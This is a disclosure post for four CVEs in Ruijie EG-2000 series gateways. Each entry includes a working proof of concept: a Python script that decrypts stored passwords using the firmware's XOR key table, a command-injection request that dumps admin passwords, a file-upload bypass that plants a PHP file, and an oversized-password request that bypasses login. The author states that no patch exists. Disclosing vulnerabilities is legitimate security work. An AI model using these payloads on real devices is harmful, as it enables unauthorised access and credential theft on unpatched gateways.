We found multiple vulnerabilities based on EG-2000SE Next Gen Gateway.
CVE-2019-16638: User password is stored with symmetric encryption
CWE-257: Storing Passwords in a Recoverable Format
An issue was found on the Ruijie EG-2000 series gateway. An attacker can easily dump cleartext stored passwords in /data/config.text with simple XORs. This was tested on EG-2000SE EG_RGOS 11.1(1)B1.
PoC:
import binascii
KEYTBL = b"*@##Wxf^cOurGer*mArKLe%aIRwolf&^StarRdH#&)####^*$%!!#&)%071177"
pwd_enc = "1044407451471c"
pwd = binascii.unhexlify(pwd_enc[2:])
offset = int(pwd_enc[:2])
result = bytearray()
for i in range(len(pwd)):
result.append(pwd[i] ^ KEYTBL[i + offset])
print(result)CVE-2019-16639: Arbitrary command execution on newcli.php
CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
An issue was found on the Ruijie EG-2000 series gateway. There is a newcli.php API interface without access control, which can allow an attacker (who only has web interface access) to use TELNET commands and/or show admin passwords via the mode_url=exec&command= substring.
This affects EG-2000SE EG_RGOS 11.9 B11P1.
PoC:
POST /newcli.php HTTP/1.1
Cookies: [REDACTED]
Content-Type: application/x-www-form-urlencoded
mode_url=exec&command=show%20webmaster%20usersCVE-2019-16640: PHP file upload via upload.php
CWE-434: Unrestricted Upload of File with Dangerous Type
An issue was found in upload.php on the Ruijie EG-2000 series gateway. A parameter passed to the class UploadFile is mishandled (%00 and /var/./html are not checked), which can allow an attacker to upload any file to the gateway.
This affects EG-2000SE EG_RGOS 11.9 B11P1.
PoC:
POST upload.php?c=upload&a=index&fileext=txt&filedir=%2Fvar%2Fhtml&obj=1&_ruijie_upload%5B%5D=1
Cookies: [REDACTED]
Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266
Content-Length: 554
-----------------------------9051914041544843365972754266
Content-Disposition: form-data; name="file"; filename="/var/./html/poc.php"
<?php phpinfo();
-----------------------------9051914041544843365972754266--CVE-2019-16641: Buffer overflow on login.php
CWE-121: Stack-based Buffer Overflow
An issue was found on the Ruijie EG-2000 series gateway. There is a buffer overflow in client.so. Consequently, an attacker can use login.php to login to any account, without providing its password.
This affects EG-2000SE EG_RGOS 11.1(1)B1.
PoC:
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
username=admin&password=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFor all of the vulnerabilities I found, I have submitted bug report to Ruijie on 10/14/2019, but I didn’t get any response from them. The official patch of these vulnerabilities is not available.
0 条评论